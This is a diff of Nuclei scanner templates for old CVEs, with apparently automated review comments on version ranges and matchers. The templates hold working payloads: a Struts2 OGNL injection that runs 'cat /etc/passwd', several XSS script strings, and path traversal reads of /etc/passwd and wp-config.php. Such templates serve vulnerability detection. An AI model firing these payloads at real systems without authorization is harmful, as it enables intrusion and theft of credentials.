@@ -1,19 +1,14 @@ id: CVE-2007-1622 info: - name: "WordPress Core <= 2.1.2 - Cross-Site Scripting" + name: > + WordPress Core <= 2.1.2 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site scripting (XSS) vulnerability in wp-admin/vars.php in WordPress before 2.0.10 RC2, and before 2.1.3 RC2 in the 2.1 series, allows remote authenticated users with theme privileges to inject arbitrary web script or HTML via the PATH_INFO in the administration interface, related to loose regular expression processing of PHP_SELF." + description: > + Cross-site scripting (XSS) vulnerability in wp-admin/vars.php in WordPress before 2.0.10 RC2, and before 2.1.3 RC2 in the 2.1 series, allows remote authenticated users with theme privileges to inject arbitrary web script or HTML via the PATH_INFO in the administration interface, related to loose regular expression processing of PHP_SELF. reference: - - http://www.vupen.com/english/advisories/2007/1005 - - http://www.buayacorp.com/files/wordpress/wordpress-advisory.txt - - http://www.securityfocus.com/bid/23027 - - http://secunia.com/advisories/25108 - - http://secunia.com/advisories/24567 - - http://www.debian.org/security/2007/dsa-1285 - - http://sla.ckers.org/forum/read.php?2,7935#msg-8006 - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a6074c97-619d-4f47-97c7-781c7a38019d?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -37,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '<= 2.0.9') - - compare_versions(version_by_js, '<= 2.0.9') - - compare_versions(version_by_css, '<= 2.0.9') + - compare_versions(version_by_generator, '>= 2.1', '<= 2.1.2') + - compare_versions(version_by_js, '>= 2.1', '<= 2.1.2') + - compare_versions(version_by_css, '>= 2.1', '<= 2.1.2') - type: status status: 
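Review bot: The second hunk replaces the `'<= 2.0.9'` constraints with `'>= 2.1', '<= 2.1.2'`, which removes coverage of the 2.0 branch even though the description explicitly says the vars.php XSS is present before 2.0.10 RC2 as well as before 2.1.3 RC2; every 2.0.x site is now a false negative. Keep the three removed `'<= 2.0.9'` entries alongside the new 2.1-branch entries, so each version source has one expression per branch, which works because DSL entries in one matcher are ORed by default (worth confirming no `condition: and` is set above the hunk). The name `<= 2.1.2` should then also mention the 2.0 branch.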
diff --git a/nuclei-templates/CVE-2007/CVE-2007-1893.yaml b/nuclei-templates/CVE-2007/CVE-2007-1893.yaml index 4ec85416e9..8ff05c1770 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1893.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1893.yaml @@ -1,19 +1,14 @@ id: CVE-2007-1893 info: - name: "WordPress Core < 2.1.3 - Authorization Bypass" + name: > + WordPress Core < 2.1.3 - Authorization Bypass author: topscoder severity: medium - description: "xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users with the contributor role to bypass intended access restrictions and invoke the publish_posts functionality, which can be used to 'publish a previously saved post.'" + description: > + xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users with the contributor role to bypass intended access restrictions and invoke the publish_posts functionality, which can be used to "publish a previously saved post." reference: - - http://www.vupen.com/english/advisories/2007/1245 - - http://secunia.com/advisories/25108 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/33470 - - http://trac.wordpress.org/ticket/4091 - - http://www.notsosecure.com/folder2/2007/04/03/wordpress-212-xmlrpc-security-issues/ - - http://secunia.com/advisories/24751 - - http://www.debian.org/security/2007/dsa-1285 - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/292be50c-6eab-4462-b46c-c7763e8aa223?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N cvss-score: 4.3 diff --git a/nuclei-templates/CVE-2007/CVE-2007-1894.yaml b/nuclei-templates/CVE-2007/CVE-2007-1894.yaml index 19a507b594..6a87ee37a6 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1894.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-1894.yaml 
@@ -1,21 +1,14 @@ id: CVE-2007-1894 info: - name: "WordPress Core <= 2.1.2 - Cross-Site Scripting" + name: > + WordPress Core <= 2.1.2 - Cross-Site Scripting author: topscoder severity: medium - description: "Cross-site scripting (XSS) vulnerability in wp-includes/general-template.php in WordPress before 20070309 allows remote attackers to inject arbitrary web script or HTML via the year parameter in the wp_title function." + description: > + Cross-site scripting (XSS) vulnerability in wp-includes/general-template.php in WordPress before 20070309 allows remote attackers to inject arbitrary web script or HTML via the year parameter in the wp_title function. reference: - - http://secunia.com/advisories/24485 - - http://www.securityfocus.com/bid/22902 - - http://trac.wordpress.org/changeset/5003 - - http://secunia.com/advisories/25108 - - http://www.securityfocus.com/archive/1/462374/100/0/threaded - - http://trac.wordpress.org/ticket/4093 - - http://securityreason.com/securityalert/2526 - - http://www.debian.org/security/2007/dsa-1285 - - http://chxsecurity.org/advisories/adv-1-mid.txt - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c7d04f7d-d114-4104-a7cb-298c148e2b6d?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N cvss-score: 6.4 @@ -39,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '<= 2.0.9') - - compare_versions(version_by_js, '<= 2.0.9') - - compare_versions(version_by_css, '<= 2.0.9') + - compare_versions(version_by_generator, '>= 2.1', '<= 2.1.2') + - compare_versions(version_by_js, '>= 2.1', '<= 2.1.2') + - compare_versions(version_by_css, '>= 2.1', '<= 2.1.2') - type: status status: diff --git a/nuclei-templates/CVE-2007/CVE-2007-1897.yaml b/nuclei-templates/CVE-2007/CVE-2007-1897.yaml index 98bc59ef42..7bddd83880 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-1897.yaml 
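Review bot: The new lower bound `'>= 2.1'` in the CVE-2007-1894 matcher hunk is not supported by anything in the template: the description says "before 20070309" with no floor, the name says `<= 2.1.2`, and the Debian DSA-1285 reference being removed in the first hunk covered both the 2.0 and 2.1 branches. Unless the 2.0 branch is confirmed unaffected, the constraint should be `- compare_versions(version_by_generator, '<= 2.1.2')` (and the same for `version_by_js` and `version_by_css`) so 2.0.x installs are not silently excluded. The previous `<= 2.0.9` matcher missed every 2.1.x install, so the new window is an improvement in that direction, but it trades one gap for another. The request that derives the `version_by_*` values is outside this hunk.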
+++ b/nuclei-templates/CVE-2007/CVE-2007-1897.yaml @@ -1,20 +1,14 @@ id: CVE-2007-1897 info: - name: "WordPress Core < 2.1.3 - SQL Injection" + name: > + WordPress Core < 2.1.3 - SQL Injection author: topscoder severity: high - description: "SQL injection vulnerability in xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users to execute arbitrary SQL commands via a string parameter value in an XML RPC mt.setPostCategories method call, related to the post_id variable." + description: > + SQL injection vulnerability in xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users to execute arbitrary SQL commands via a string parameter value in an XML RPC mt.setPostCategories method call, related to the post_id variable. reference: - - https://www.exploit-db.com/exploits/3656 - - http://www.vupen.com/english/advisories/2007/1245 - - http://secunia.com/advisories/25108 - - http://trac.wordpress.org/ticket/4091 - - http://www.notsosecure.com/folder2/2007/04/03/wordpress-212-xmlrpc-security-issues/ - - http://secunia.com/advisories/24751 - - http://www.securityfocus.com/bid/23294 - - http://www.debian.org/security/2007/dsa-1285 - - https://wordpress.org/news/2007/04/wordpress-213-and-2010/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/65c72e79-f0a9-4293-98be-956d8e4afb83?source=api-prod classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -38,9 +32,9 @@ http: matchers: - type: dsl dsl: - - compare_versions(version_by_generator, '< 2.1.3') - - compare_versions(version_by_js, '< 2.1.3') - - compare_versions(version_by_css, '< 2.1.3') + - compare_versions(version_by_generator, '<= 2.1.3') + - compare_versions(version_by_js, '<= 2.1.3') + - compare_versions(version_by_css, '<= 2.1.3') - type: status status: 
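Review bot: Changing the three constraints from `'< 2.1.3'` to `'<= 2.1.3'` in the second hunk makes the template flag the patched release 2.1.3 as vulnerable, and contradicts the template's own `name: WordPress Core < 2.1.3 - SQL Injection`; the description only asserts 2.1.2 "and probably earlier". The previous bound was correct, so keep `- compare_versions(version_by_generator, '< 2.1.3')` and the matching `version_by_js` / `version_by_css` lines. If there is evidence 2.1.3 is still affected, the name and description should say so rather than the matcher alone. The `http:` block these variables come from starts outside this hunk.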
diff --git a/nuclei-templates/CVE-2007/CVE-2007-4556.yaml b/nuclei-templates/CVE-2007/CVE-2007-4556.yaml deleted file mode 100644 index 26b2abdb28..0000000000 --- a/nuclei-templates/CVE-2007/CVE-2007-4556.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2007-4556 -info: - name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution - author: pikpikcu - severity: critical - description: | - Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. - reference: - - https://www.guildhab.top/?p=2326 - - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 - - https://cwiki.apache.org/confluence/display/WW/S2-001 - - http://forums.opensymphony.com/ann.jspa?annID=54 - classification: - cve-id: CVE-2007-4556 - tags: cve,cve2007,apache,rce,struts -requests: - - method: POST - path: - - "{{BaseURL}}/login.action" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/10 
diff --git a/nuclei-templates/CVE-2007/CVE-2007-5728.yaml b/nuclei-templates/CVE-2007/CVE-2007-5728.yaml deleted file mode 100644 index e3e78104af..0000000000 --- a/nuclei-templates/CVE-2007/CVE-2007-5728.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2007-5728 - -info: - name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting - author: dhiyaneshDK - severity: medium - description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865. - reference: - - https://www.exploit-db.com/exploits/30090 - - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html - - http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/ - - http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/ - classification: - cve-id: CVE-2007-5728 - metadata: - shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2007,xss,pgadmin,phppgadmin - -requests: - - method: GET - path: - - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test' - - matchers-condition: and - matchers: - - - type: word - words: - - '' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2007/cve-2007-0885.yaml b/nuclei-templates/CVE-2007/cve-2007-0885.yaml new file mode 100644 index 0000000000..b237557509 --- /dev/null +++ b/nuclei-templates/CVE-2007/cve-2007-0885.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2007-0885 + +info: + name: Rainbow.Zen Jira XSS + description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded + author: geeknik + severity: medium + tags: cve,cve2007,jira,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e' + + matchers-condition: and + matchers: + - type: word + words: + - '">' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2007/cve-2007-4556.yaml b/nuclei-templates/CVE-2007/cve-2007-4556.yaml new file mode 100644 index 0000000000..1a7b1450ed --- /dev/null +++ b/nuclei-templates/CVE-2007/cve-2007-4556.yaml 
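Review bot: As rendered here, the body `word` matcher in the new cve-2007-0885.yaml is just `'">'`, which is a fragment that almost any page echoing a quoted attribute will contain rather than a check that the injected payload was reflected; if the `<script>` element was dropped by the rendering of this page then ignore this, otherwise the word should be the decoded payload `"><script>alert(document.domain)</script>`. The template also writes `reference:` as a bare scalar and omits a `classification:` block with `cve-id: CVE-2007-0885`, whereas the other CVE templates touched by this commit use a reference list and carry a classification, so I would align it with them. It also uses the `requests:` key that CVE-2008-1059, CVE-2008-6465 and CVE-2008-6982 migrate to `http:` in the same commit.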
@@ -0,0 +1,30 @@ +id: CVE-2007-4556 + +info: + name: Apache Struts2 S2-001 RCE + author: pikpikcu + severity: critical + description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character. + reference: https://www.guildhab.top/?p=2326 + tags: cve,cve2007,apache,rce,struts + +requests: + - method: POST + path: + - "{{BaseURL}}/login.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2007/cve-2007-5728.yaml b/nuclei-templates/CVE-2007/cve-2007-5728.yaml new file mode 100644 index 0000000000..9d71758d46 --- /dev/null +++ b/nuclei-templates/CVE-2007/cve-2007-5728.yaml 
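Review bot: This new cve-2007-4556.yaml re-adds the template deleted earlier in the same commit under a case-changed filename, but with less metadata: the `classification:` block with `cve-id: CVE-2007-4556`, the NVD entry and the Apache `S2-001` advisory are gone, leaving only a `https://www.guildhab.top/?p=2326` blog reference. For an RCE template whose payload executes `cat /etc/passwd` on the target, the authoritative advisory is the reference a user will want when triaging a hit, so I would restore `- https://cwiki.apache.org/confluence/display/WW/S2-001` and `- https://nvd.nist.gov/vuln/detail/CVE-2007-4556` and the classification block. The file also keeps the `requests:` key while other templates in this commit move to `http:`, and the repository now mixes `CVE-` and `cve-` filename prefixes with renames going in both directions (compare the CVE-2008-2398 and CVE-2008-6172 renames), which is worth settling on one convention.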
@@ -0,0 +1,32 @@ +id: CVE-2007-5728 + +info: + name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865. + tags: cve,cve2007,xss,pgadmin,phppgadmin + reference: https://www.exploit-db.com/exploits/30090 + metadata: + shodan-query: 'http.title:"phpPgAdmin"' + +requests: + - method: GET + path: + - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2008/CVE-2008-1059.yaml b/nuclei-templates/CVE-2008/CVE-2008-1059.yaml index a61fe66200..4d096ce1ea 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-1059.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-1059.yaml 
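Review bot: As rendered here, the first `word` matcher in the new cve-2007-5728.yaml is an empty string `''`; an empty word is contained in every body, so combined with `status 200` and `text/html` the template would fire on any HTML page, unless the `<script>alert("document.domain")</script>` payload string was stripped by the rendering of this page, in which case disregard. Either way the matcher should be the decoded reflection of the payload, e.g. `- '"><script>alert("document.domain")</script>'`. Compared with the CVE-2007-5728.yaml deleted in this same commit, this copy also drops the `classification:` block and three of the four references, keeping only `https://www.exploit-db.com/exploits/7363`-style exploit-db provenance; restoring `cve-id: CVE-2007-5728` and the archived advisory links would keep the re-add from being a regression.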
@@ -6,19 +6,31 @@ info: severity: high description: | PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. + remediation: | + Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1059 - - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/ + - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40829 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2008-1059 - cwe-id: CWE-79 - tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan + cwe-id: CWE-94 + epss-score: 0.01493 + epss-percentile: 0.86573 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: cve2008,cve,lfi,wordpress,wp-plugin,wp,sniplets,edb,wpscan -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php' @@ -35,5 +47,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 +# digest: 4a0a0047304502205ecbba6e0e199b46f608f16ac8f807072e05bbafa717633027622a0dda0496fe022100df4658dec4f7e3cb9a3a5a504830913ca49faea4c712f6285b50dbc2ea9d1df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
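Review bot: The added `remediation:` text speaks of "the LFI vulnerability" while the description above it and the new `cwe-id: CWE-94` describe a PHP remote file inclusion, so the template now disagrees with itself about what it detects; the probe `libpath=../../../../wp-config.php` is a local traversal, so `remediation: Update the WordPress Sniplets plugin or remove it; the libpath parameter allows local and remote file inclusion.` would match all three. Note also that a PHP `include` of `wp-config.php` executes the file rather than echoing it, so whatever the body matcher keys on (it is outside this hunk) deserves a check against a real response. The trailing `# digest:` line is a signature over the template content, so any of these wording fixes requires re-signing with nuclei rather than editing the line by hand.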
diff --git a/nuclei-templates/CVE-2008/CVE-2008-1061.yaml b/nuclei-templates/CVE-2008/CVE-2008-1061.yaml index 3fda88c56f..b395ef595b 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-1061.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-1061.yaml 
@@ -3,22 +3,47 @@ id: CVE-2008-1061 info: name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1061 - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40830 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-1061 cwe-id: CWE-79 - tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets + epss-score: 0.00663 + epss-percentile: 0.77516 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Code Snippets' -requests: - method: GET path: - 
'{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' @@ -38,6 +63,4 @@ requests: - type: status status: - 200 - - -# Enhanced by mp on 2022/08/31 +# digest: 4a0a004730450220777bd4294b2dc57575646d8dc88fd119dc51c0d25f2086f36a7cdefefe5647e7022100df472d5c3da8f1e15e7c99529215af99987384e58c92d925163f10813a236e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/CVE-2008-1547.yaml b/nuclei-templates/CVE-2008/CVE-2008-1547.yaml index ce8f0401d5..95335e8942 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-1547.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-1547.yaml 
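Review bot: The new `flow: http(1) && http(2)` gates the XSS probe on `/wp-content/plugins/sniplets/readme.txt` containing `Code Snippets`, so hosts that strip plugin readmes (a common hardening step) or ship a readme with different wording will never receive the second request and become false negatives where the previous single-request template would have fired. That is a defensible noise-reduction trade-off, but it should be stated in the template, e.g. a comment above the flow line: `# readme.txt gate: hosts that remove plugin readmes are not probed for the XSS`. I cannot confirm from the hunk that the Sniplets readme actually contains the string `Code Snippets`, so that fingerprint is worth verifying against the plugin archive before relying on it. The second request's matchers continue outside this hunk.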
@@ -6,25 +6,30 @@ info: severity: medium description: | Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. + impact: | + An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks. + remediation: | + Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-1547 - https://www.exploit-db.com/exploits/32489 - http://securityreason.com/securityalert/4441 - https://exchange.xforce.ibmcloud.com/vulnerabilities/46061 + - https://github.com/tr3ss/newclei classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-1547 cwe-id: CWE-601 - epss-score: 0.03523 + epss-score: 0.03875 + epss-percentile: 0.9108 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* - epss-percentile: 0.90347 metadata: max-request: 2 - shodan-query: http.title:"Outlook" vendor: microsoft product: exchange_server - tags: cve,cve2008,redirect,owa,exchange,microsoft + shodan-query: http.title:"Outlook" + tags: cve2008,cve,redirect,owa,exchange,microsoft http: - method: GET @@ -38,3 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4b0a00483046022100add61103f83105e6e0184e371a84b94bef42e3e534eec0ba3c444c81e603b7df022100c59d3962095aa5e3dc9897e04b109f9407889fe544bd9737d9675a3b767dc339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/cve-2008-2398.yaml b/nuclei-templates/CVE-2008/CVE-2008-2398.yaml similarity index 100% rename from nuclei-templates/CVE-2008/cve-2008-2398.yaml rename to nuclei-templates/CVE-2008/CVE-2008-2398.yaml 
diff --git a/nuclei-templates/CVE-2008/cve-2008-2650.yaml b/nuclei-templates/CVE-2008/CVE-2008-2650.yaml similarity index 100% rename from nuclei-templates/CVE-2008/cve-2008-2650.yaml rename to nuclei-templates/CVE-2008/CVE-2008-2650.yaml diff --git a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml b/nuclei-templates/CVE-2008/CVE-2008-4668.yaml index 9ab2e385ac..ab38886489 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-4668.yaml @@ -1,4 +1,5 @@ id: CVE-2008-4668 + info: name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal author: daffainfo @@ -7,20 +8,20 @@ info: reference: - https://www.exploit-db.com/exploits/6618 - https://www.cvedetails.com/cve/CVE-2008-4668 - - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ - - http://securityreason.com/securityalert/4464 - classification: - cve-id: CVE-2008-4668 tags: cve,cve2008,joomla,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-5587.yaml b/nuclei-templates/CVE-2008/CVE-2008-5587.yaml index 6045940b95..fda684a006 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-5587.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-5587.yaml 
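Review bot: The CVE-2008-4668 hunk removes the `classification:` block (`cve-id: CVE-2008-4668`) and two of the four references, which runs against the rest of this commit, where CVE-2008-1059, CVE-2008-1061 and CVE-2008-5587 gain classification, CPE and EPSS fields. The `cve-id` field is what downstream tooling uses to correlate findings with the CVE, so I would keep `classification:` with `cve-id: CVE-2008-4668` even if the dead securityfocus and securityreason links are pruned. Dropping the trailing colon from the regex (`root:.*:0:0`) is harmless for a real `/etc/passwd` but is unrelated to the metadata cleanup and would be clearer as its own change.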
@@ -1,27 +1,28 @@ id: CVE-2008-5587 - info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - tags: cve2008,lfi,phppgadmin + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ + - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 + - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." - + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-6465.yaml b/nuclei-templates/CVE-2008/CVE-2008-6465.yaml index e5c8f02562..76631b2aac 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-6465.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-6465.yaml 
